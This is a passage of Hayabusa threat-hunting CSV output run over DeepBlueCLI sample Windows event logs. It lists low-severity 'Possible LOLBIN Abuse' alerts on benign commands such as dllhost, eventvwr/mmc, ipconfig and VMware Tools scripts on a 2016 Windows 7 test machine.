/Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x304 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 22:22:15.298 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: 
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x3a0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 22:22:37.732 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1194 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 23:36:31.003 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0x1130 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 00:21:31.129 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\msiexec.exe"" /i ""C:\Users\IEUser\Downloads\EMET Setup.msi"" | Path: C:\Windows\System32\msiexec.exe | PID: 0xaf0 | User: IEUser | LID: 0x4d011",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 00:21:31.333 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x11dc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 02:31:58.790 
+09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x15c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 02:31:58.886 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xcac | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 02:32:06.392 +09:00,IE10Win7,7045,info,Persis,Service Installed,"Name: Mozilla Maintenance Service | Path: ""C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-31 02:32:07.392 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x13ac | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 03:26:31.346 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0x1560 | User: IEUser | LID: 
0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 03:53:34.038 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x11d4 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 03:53:34.114 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x1284 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 03:54:17.892 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xe18 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 03:54:17.934 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x880 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 
03:55:17.369 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1670 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 03:55:17.405 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0xd58 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 03:55:29.358 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-system.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x8dc | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 03:55:29.420 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-system.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x748 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 03:56:17.432 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" 
/l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1788 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 03:56:17.468 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x8e4 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 03:56:42.015 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xe70 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 03:56:42.074 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0xfd4 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 03:59:41.893 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xfac | User: IEUser | LID: 
0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 03:59:41.954 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x1798 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 04:00:08.701 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x14ac | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 04:00:08.738 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x1708 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 04:00:25.559 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xf80 | User: IEUser | LID: 
0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 04:00:25.615 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x2a4 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 04:00:45.207 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x298 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 04:00:45.252 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0xf44 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 04:02:16.930 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x4cc | User: IEUser | LID: 
0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 04:02:16.995 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x1520 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 04:03:18.080 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x11fc | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 04:03:18.108 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0xaac | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 05:48:41.903 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x13b8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 
+2016-08-31 05:49:01.091 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x14c8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 05:50:48.340 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x7dc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 05:51:10.630 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x10f8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 09:09:04.159 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x1064 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 09:09:04.174 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xb50 | User: IE10WIN7$ | LID: 
0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 09:11:15.295 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x12b4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 09:11:16.100 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x1264 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 09:11:16.210 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x1694 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 09:11:29.568 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x12c0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 09:11:35.821 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe 
/Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1300 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 09:12:06.943 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x738 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 09:12:06.951 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x1128 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 00:54:06.516 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0x1100 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 00:54:07.012 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x13f8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 00:54:07.725 +09:00,IE10Win7,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x888 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 00:54:07.802 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x1744 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 00:54:09.426 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x1464 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 00:54:28.302 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x17bc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 01:12:27.928 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1274 | User: IEUser | LID: 
0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 01:12:27.973 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x8d0 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 01:18:44.431 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1044 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 01:18:44.458 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x16d4 | User: IEUser | 